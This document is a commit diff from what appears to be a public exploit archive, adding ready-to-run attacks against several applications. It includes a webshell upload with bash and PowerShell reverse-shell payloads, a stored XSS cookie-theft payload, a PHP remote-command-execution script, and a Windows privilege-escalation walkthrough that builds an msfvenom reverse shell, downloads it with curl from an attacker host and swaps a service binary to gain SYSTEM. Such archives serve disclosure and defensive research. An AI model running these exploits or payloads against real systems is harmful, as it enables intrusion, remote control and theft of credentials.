DB: 2021-12-02
4 changes to exploits/shellcodes MilleGPG5 5.7.2 Luglio 2021 - Local Privilege Escalation Online Enrollment Management System in PHP and PayPal 1.0 - 'U_NAME' Stored Cross-Site Scripting Advanced Comment System 1.0 - Remote Command Execution (RCE)
This commit is contained in:
parent
ebf638ee1a
commit
1abdd81300
5 changed files with 268 additions and 13 deletions
|
@ -49,11 +49,8 @@ class Exploit:
|
||||||
|
|
||||||
}
|
}
|
||||||
|
|
||||||
#Creates user "bypass" and upload a simple webshell without
|
#Creates user "bypass" and upload a simple webshell without authentication
|
||||||
authentication
|
request = self.session.post(url,data=data,headers=self.headers,files={"image":(self.shell_name +'.php',"<?=`$_GET[cmd]`?>")})
|
||||||
request = self.session.post(url,
|
|
||||||
data=data,headers=self.headers,files={"image":(self.shell_name
|
|
||||||
+'.php',"<?=`$_GET[cmd]`?>")})
|
|
||||||
time.sleep(3)
|
time.sleep(3)
|
||||||
if (request.status_code == 200):
|
if (request.status_code == 200):
|
||||||
print('[*] The user and webshell were created\n')
|
print('[*] The user and webshell were created\n')
|
||||||
|
@ -69,8 +66,7 @@ data=data,headers=self.headers,files={"image":(self.shell_name
|
||||||
|
|
||||||
#Use a payload in bash to get a reverse shell
|
#Use a payload in bash to get a reverse shell
|
||||||
payload = 'bash+-c+"bash+-i+>%26+/dev/tcp/'+self.LHL+'+0>%261"'
|
payload = 'bash+-c+"bash+-i+>%26+/dev/tcp/'+self.LHL+'+0>%261"'
|
||||||
execute_command =
|
execute_command = self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload
|
||||||
self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload
|
|
||||||
|
|
||||||
try:
|
try:
|
||||||
request_rce = requests.get(execute_command)
|
request_rce = requests.get(execute_command)
|
||||||
|
@ -86,11 +82,9 @@ self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload
|
||||||
time.sleep(3)
|
time.sleep(3)
|
||||||
|
|
||||||
#Use a payload in powershell to get a reverse shell
|
#Use a payload in powershell to get a reverse shell
|
||||||
payload =
|
payload = """powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient("""+self.HPW+""")%3b$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0)
|
||||||
"""powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient("""+self.HPW+""")%3b$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0)
|
|
||||||
{%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()"""""
|
{%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()"""""
|
||||||
execute_command =
|
execute_command = self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload
|
||||||
self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload
|
|
||||||
|
|
||||||
|
|
||||||
try:
|
try:
|
||||||
|
@ -105,8 +99,7 @@ self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload
|
||||||
|
|
||||||
|
|
||||||
def get_args():
|
def get_args():
|
||||||
parser = argparse.ArgumentParser(description='Laundry Booking
|
parser = argparse.ArgumentParser(description='Laundry Booking Management System')
|
||||||
Management System')
|
|
||||||
parser.add_argument('-t', '--target', dest="target", required=True,
|
parser.add_argument('-t', '--target', dest="target", required=True,
|
||||||
action='store', help='Target url')
|
action='store', help='Target url')
|
||||||
parser.add_argument('-s', '--shell_name', dest="shell_name",
|
parser.add_argument('-s', '--shell_name', dest="shell_name",
|
||||||
|
|
68
exploits/php/webapps/50557.txt
Normal file
68
exploits/php/webapps/50557.txt
Normal file
|
@ -0,0 +1,68 @@
|
||||||
|
# Exploit Title: Online Enrollment Management System in PHP and PayPal 1.0 - 'U_NAME' Stored Cross-Site Scripting
|
||||||
|
# Date: 2021-08-31
|
||||||
|
# Exploit Author: Tushar Jadhav
|
||||||
|
# Vendor Homepage: https://www.sourcecodester.com/
|
||||||
|
# Software Link: https://www.sourcecodester.com/php/12914/online-enrollment-management-system-paypal-payments-phpmysqli.html
|
||||||
|
# Version: 1.0
|
||||||
|
# Tested on: Windows 11
|
||||||
|
# Contact: https://www.linkedin.com/in/tushar-jadhav-7a43b4171/
|
||||||
|
# CVE: CVE-2021-40577
|
||||||
|
|
||||||
|
=============================================================================================================================
|
||||||
|
|
||||||
|
Stored Cross-site scripting(XSS):
|
||||||
|
|
||||||
|
Stored attacks are those where the injected script is permanently stored on
|
||||||
|
the target servers,
|
||||||
|
such as in a database, in a message forum, visitor log, comment field, etc.
|
||||||
|
The victim then retrieves the malicious script from the server when it
|
||||||
|
requests the stored information.
|
||||||
|
Stored XSS is also sometimes referred to as Persistent XSS.
|
||||||
|
|
||||||
|
==============================================================================================================================
|
||||||
|
|
||||||
|
Attack vector:
|
||||||
|
|
||||||
|
This vulnerability can result in the attacker can injecting the XSS payload
|
||||||
|
in the User Registration section. Each time the admin login or basic user
|
||||||
|
Login in the admin panel, the XSS triggers and attacker can able to steal
|
||||||
|
the cookie according to the crafted payload.
|
||||||
|
|
||||||
|
===============================================================================================================================
|
||||||
|
|
||||||
|
Vulnerable Parameters: Name
|
||||||
|
|
||||||
|
===============================================================================================================================
|
||||||
|
|
||||||
|
Steps for reproducing:
|
||||||
|
|
||||||
|
1. Go to add users section
|
||||||
|
2. fill in the details. & put <script>alert(document.cookie)</script>
|
||||||
|
payload in Name parameter.
|
||||||
|
3. Once we click on save, We can see the XSS has been triggered.
|
||||||
|
|
||||||
|
================================================================================================================================
|
||||||
|
|
||||||
|
Request :
|
||||||
|
|
||||||
|
POST /onlineenrolmentsystem/admin/user/controller.php?action=add HTTP/1.1
|
||||||
|
Host: 192.168.1.205:81
|
||||||
|
Content-Length: 133
|
||||||
|
Cache-Control: max-age=0
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
Origin: http://192.168.1.205:81
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
|
||||||
|
(KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
|
||||||
|
Accept:
|
||||||
|
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||||
|
Referer:
|
||||||
|
http://192.168.1.205:81/onlineenrolmentsystem/admin/user/index.php?view=add
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
|
||||||
|
Cookie: PHPSESSID=uonlna5pmhqh9shnj8t6oqc2g3
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
deptid=&U_NAME=%3Cscript%3Ealert%28window.origin%29%3C%2Fscript%3E&deptid=&U_USERNAME=test&deptid=&U_PASS=root&U_ROLE=Registrar&save=
|
||||||
|
|
||||||
|
===================================================================================================================================
|
65
exploits/php/webapps/50559.py
Executable file
65
exploits/php/webapps/50559.py
Executable file
|
@ -0,0 +1,65 @@
|
||||||
|
# Exploit Title: Advanced Comment System 1.0 - Remote Command Execution (RCE)
|
||||||
|
# Date: November 30, 2021
|
||||||
|
# Exploit Author: Nicole Daniella Murillo Mejias
|
||||||
|
# Version: Advanced Comment System 1.0
|
||||||
|
# Tested on: Linux
|
||||||
|
|
||||||
|
#!/usr/bin/env python3
|
||||||
|
|
||||||
|
# DESCRIPTION:
|
||||||
|
# Commands are Base64 encoded and sent via POST requests to the vulnerable application, the
|
||||||
|
# response is filtered by the randomly generated alphanumeric string and only command output
|
||||||
|
# is displayed.
|
||||||
|
#
|
||||||
|
# USAGE:
|
||||||
|
# Execute the script and pass the command to execute as arguments, they can be quoted or unquoted
|
||||||
|
# If any special characters are used, they should be quoted with single quotes.
|
||||||
|
#
|
||||||
|
# Example:
|
||||||
|
#
|
||||||
|
# python3 acspoc.py uname -a
|
||||||
|
# python3 acspoc.py 'bash -i >& /dev/tcp/127.0.0.1/4444 0>&1'
|
||||||
|
|
||||||
|
import sys
|
||||||
|
import base64
|
||||||
|
import requests
|
||||||
|
import random
|
||||||
|
|
||||||
|
def generate_string(size):
|
||||||
|
str = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
|
||||||
|
return ''.join(random.choice(str) for i in range(size))
|
||||||
|
|
||||||
|
def exploit(cmd):
|
||||||
|
|
||||||
|
# TODO: Change the URL to the target host
|
||||||
|
url = 'http://127.0.0.1/advanced_comment_system/index.php'
|
||||||
|
|
||||||
|
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
|
||||||
|
|
||||||
|
encoded_cmd = base64.b64encode(cmd)
|
||||||
|
|
||||||
|
delimiter = generate_string(6).encode()
|
||||||
|
|
||||||
|
body = b'ACS_path=php://input%00&cbcmd='
|
||||||
|
body += encoded_cmd
|
||||||
|
body += b'&<?php echo " '
|
||||||
|
body += delimiter
|
||||||
|
body += b': ".shell_exec(base64_decode($_REQUEST["cbcmd"])); die ?>'
|
||||||
|
|
||||||
|
try:
|
||||||
|
result = requests.post(url=url, headers=headers, data=body)
|
||||||
|
except KeyboardInterrupt:
|
||||||
|
print("Keyboard interrupt detected.")
|
||||||
|
sys.exit()
|
||||||
|
|
||||||
|
if f'{delimiter.decode()}: ' in result.text:
|
||||||
|
position = result.text.find(f"{delimiter.decode()}:") + len(f"{delimiter.decode()}: ")
|
||||||
|
|
||||||
|
if len(result.text[position:]) > 0:
|
||||||
|
print(result.text[position:])
|
||||||
|
else:
|
||||||
|
print(f"No output from command '{cmd.decode()}'")
|
||||||
|
print(f"Response size from target host: {len(result.text)} bytes")
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
exploit(' '.join(sys.argv[1:]).encode())
|
126
exploits/windows/local/50558.txt
Normal file
126
exploits/windows/local/50558.txt
Normal file
|
@ -0,0 +1,126 @@
|
||||||
|
# Exploit Title: MilleGPG5 5.7.2 Luglio 2021 (x64) - Local Privilege Escalation
|
||||||
|
# Date: 2021-07-19
|
||||||
|
# Author: Alessandro 'mindsflee' Salzano
|
||||||
|
# Vendor Homepage: https://millegpg.it/
|
||||||
|
# Software Homepage: https://millegpg.it/
|
||||||
|
# Software Link: https://www.millegpg.it/download/MilleGPGInstall.exe
|
||||||
|
# Version: 5.7.2
|
||||||
|
# Tested on: Microsoft Windows 10 Enterprise x64
|
||||||
|
|
||||||
|
MilleGPG5 is a Class 1 Medical Device registered with "Ministero della Salute".
|
||||||
|
|
||||||
|
Vendor: Millennium S.r.l. / Dedalus Group / Dedalus Italia S.p.a.
|
||||||
|
|
||||||
|
Affected version: MilleGPG5 5.7.2
|
||||||
|
|
||||||
|
# Details
|
||||||
|
# By default the Authenticated Users group has the modify permission to MilleGPG5 folders/files as shown below.
|
||||||
|
# A low privilege account is able to rename the mysqld.exe file located in bin folder and replace
|
||||||
|
# with a malicious file that would connect back to an attacking computer giving system level privileges
|
||||||
|
# (nt authority\system) due to the service running as Local System.
|
||||||
|
# While a low privilege user is unable to restart the service through the application, a restart of the
|
||||||
|
# computer triggers the execution of the malicious file.
|
||||||
|
|
||||||
|
(1) Impacted services.
|
||||||
|
Any low privileged user can elevate their privileges abusing these services:
|
||||||
|
|
||||||
|
C:\Program Files\MilleGPG5\MariaDB\bin\mysqld.exe
|
||||||
|
C:\Program Files\MilleGPG5\GPGService.exe
|
||||||
|
|
||||||
|
|
||||||
|
Details:
|
||||||
|
|
||||||
|
|
||||||
|
SERVICE_NAME: MariaDB-GPG
|
||||||
|
TYPE : 10 WIN32_OWN_PROCESS
|
||||||
|
START_TYPE : 2 AUTO_START
|
||||||
|
ERROR_CONTROL : 1 NORMAL
|
||||||
|
BINARY_PATH_NAME : "C:\Program
|
||||||
|
Files\MilleGPG5\MariaDB\bin\mysqld.exe" MariaDB-GPG
|
||||||
|
LOAD_ORDER_GROUP :
|
||||||
|
TAG : 0
|
||||||
|
DISPLAY_NAME : MariaDB-GPG
|
||||||
|
DEPENDENCIES :
|
||||||
|
SERVICE_START_NAME : LocalSystem
|
||||||
|
|
||||||
|
------
|
||||||
|
|
||||||
|
SERVICE_NAME: GPGOrchestrator
|
||||||
|
TYPE : 10 WIN32_OWN_PROCESS
|
||||||
|
START_TYPE : 2 AUTO_START
|
||||||
|
ERROR_CONTROL : 1 NORMAL
|
||||||
|
BINARY_PATH_NAME : "C:\Program Files\MilleGPG5\GPGService.exe"
|
||||||
|
LOAD_ORDER_GROUP :
|
||||||
|
TAG : 0
|
||||||
|
DISPLAY_NAME : GPG Orchestrator
|
||||||
|
DEPENDENCIES :
|
||||||
|
SERVICE_START_NAME : LocalSystem
|
||||||
|
|
||||||
|
(2) Folder permissions.
|
||||||
|
Insecure folders permissions issue:
|
||||||
|
|
||||||
|
|
||||||
|
C:\Program Files\MilleGPG5\MariaDB\bin BUILTIN\Users:(I)(OI)(CI)(F)
|
||||||
|
NT SERVICE\TrustedInstaller:(I)(F)
|
||||||
|
NT
|
||||||
|
SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
|
||||||
|
NT AUTHORITY\SYSTEM:(I)(F)
|
||||||
|
NT
|
||||||
|
AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
|
||||||
|
BUILTIN\Administrators:(I)(F)
|
||||||
|
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
|
||||||
|
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
|
||||||
|
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
|
||||||
|
APPLICATION PACKAGE
|
||||||
|
AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
|
||||||
|
APPLICATION PACKAGE
|
||||||
|
AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
|
||||||
|
APPLICATION PACKAGE
|
||||||
|
AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
|
||||||
|
APPLICATION PACKAGE
|
||||||
|
AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
|
||||||
|
...[SNIP]...
|
||||||
|
---------------
|
||||||
|
|
||||||
|
C:\Program Files\MilleGPG5 BUILTIN\Users:(OI)(CI)(F)
|
||||||
|
NT SERVICE\TrustedInstaller:(I)(F)
|
||||||
|
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
|
||||||
|
NT AUTHORITY\SYSTEM:(I)(F)
|
||||||
|
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
|
||||||
|
BUILTIN\Administrators:(I)(F)
|
||||||
|
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
|
||||||
|
BUILTIN\Users:(I)(RX)
|
||||||
|
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
|
||||||
|
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
|
||||||
|
APPLICATION PACKAGE AUTHORITY\ALL
|
||||||
|
APPLICATION PACKAGES:(I)(RX)
|
||||||
|
APPLICATION PACKAGE AUTHORITY\ALL
|
||||||
|
APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
|
||||||
|
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED
|
||||||
|
APPLICATION PACKAGES:(I)(RX)
|
||||||
|
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED
|
||||||
|
APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
|
||||||
|
|
||||||
|
|
||||||
|
# Proof of Concept
|
||||||
|
|
||||||
|
1. Generate malicious .exe on attacking machine
|
||||||
|
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.102 LPORT=4242 -f exe > /var/www/html/mysqld_evil.exe
|
||||||
|
|
||||||
|
2. Setup listener and ensure apache is running on attacking machine
|
||||||
|
nc -lvp 4242
|
||||||
|
service apache2 start
|
||||||
|
|
||||||
|
3. Download malicious .exe on victim machine
|
||||||
|
type on cmd: curl http://192.168.1.102/mysqld_evil.exe -o "C:\Program Files\MilleGPG5\MariaDB\bin\mysqld_evil.exe"
|
||||||
|
|
||||||
|
4. Overwrite file and copy malicious .exe.
|
||||||
|
Renename C:\Program Files\MilleGPG5\MariaDB\bin\mysqld.exe > mysqld.bak
|
||||||
|
Rename downloaded 'mysqld_evil.exe' file in mysqld.exe
|
||||||
|
|
||||||
|
5. Restart victim machine
|
||||||
|
|
||||||
|
6. Reverse Shell on attacking machine opens
|
||||||
|
C:\Windows\system32>whoami
|
||||||
|
whoami
|
||||||
|
nt authority\system
|
|
@ -11421,6 +11421,7 @@ id,file,description,date,author,type,platform,port
|
||||||
50517,exploits/windows/local/50517.txt,"Windows MultiPoint Server 2011 SP1 - RpcEptMapper and Dnschade Local Privilege Escalation",1970-01-01,"Marcio Mendes",local,windows,
|
50517,exploits/windows/local/50517.txt,"Windows MultiPoint Server 2011 SP1 - RpcEptMapper and Dnschade Local Privilege Escalation",1970-01-01,"Marcio Mendes",local,windows,
|
||||||
50541,exploits/linux/local/50541.c,"Linux Kernel 5.1.x - 'PTRACE_TRACEME' pkexec Local Privilege Escalation (2)",1970-01-01,"Ujas Dhami",local,linux,
|
50541,exploits/linux/local/50541.c,"Linux Kernel 5.1.x - 'PTRACE_TRACEME' pkexec Local Privilege Escalation (2)",1970-01-01,"Ujas Dhami",local,linux,
|
||||||
50545,exploits/windows/local/50545.txt,"HTTPDebuggerPro 9.11 - Unquoted Service Path",1970-01-01,"Aryan Chehreghani",local,windows,
|
50545,exploits/windows/local/50545.txt,"HTTPDebuggerPro 9.11 - Unquoted Service Path",1970-01-01,"Aryan Chehreghani",local,windows,
|
||||||
|
50558,exploits/windows/local/50558.txt,"MilleGPG5 5.7.2 Luglio 2021 - Local Privilege Escalation",1970-01-01,"Alessandro Salzano",local,windows,
|
||||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
|
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
|
||||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
|
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
|
||||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
|
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
|
||||||
|
@ -44645,3 +44646,5 @@ id,file,description,date,author,type,platform,port
|
||||||
50554,exploits/multiple/webapps/50554.txt,"orangescrum 1.8.0 - 'Multiple' Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,"Hubert Wojciechowski",webapps,multiple,
|
50554,exploits/multiple/webapps/50554.txt,"orangescrum 1.8.0 - 'Multiple' Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,"Hubert Wojciechowski",webapps,multiple,
|
||||||
50555,exploits/php/webapps/50555.txt,"opencart 3.0.3.8 - Sessjion Injection",1970-01-01,"Hubert Wojciechowski",webapps,php,
|
50555,exploits/php/webapps/50555.txt,"opencart 3.0.3.8 - Sessjion Injection",1970-01-01,"Hubert Wojciechowski",webapps,php,
|
||||||
50556,exploits/php/webapps/50556.py,"Laundry Booking Management System 1.0 - Remote Code Execution (RCE)",1970-01-01,"Pablo Santiago",webapps,php,
|
50556,exploits/php/webapps/50556.py,"Laundry Booking Management System 1.0 - Remote Code Execution (RCE)",1970-01-01,"Pablo Santiago",webapps,php,
|
||||||
|
50557,exploits/php/webapps/50557.txt,"Online Enrollment Management System in PHP and PayPal 1.0 - 'U_NAME' Stored Cross-Site Scripting",1970-01-01,"Tushar Jadhav",webapps,php,
|
||||||
|
50559,exploits/php/webapps/50559.py,"Advanced Comment System 1.0 - Remote Command Execution (RCE)",1970-01-01,"Murillo Mejias",webapps,php,
|
||||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue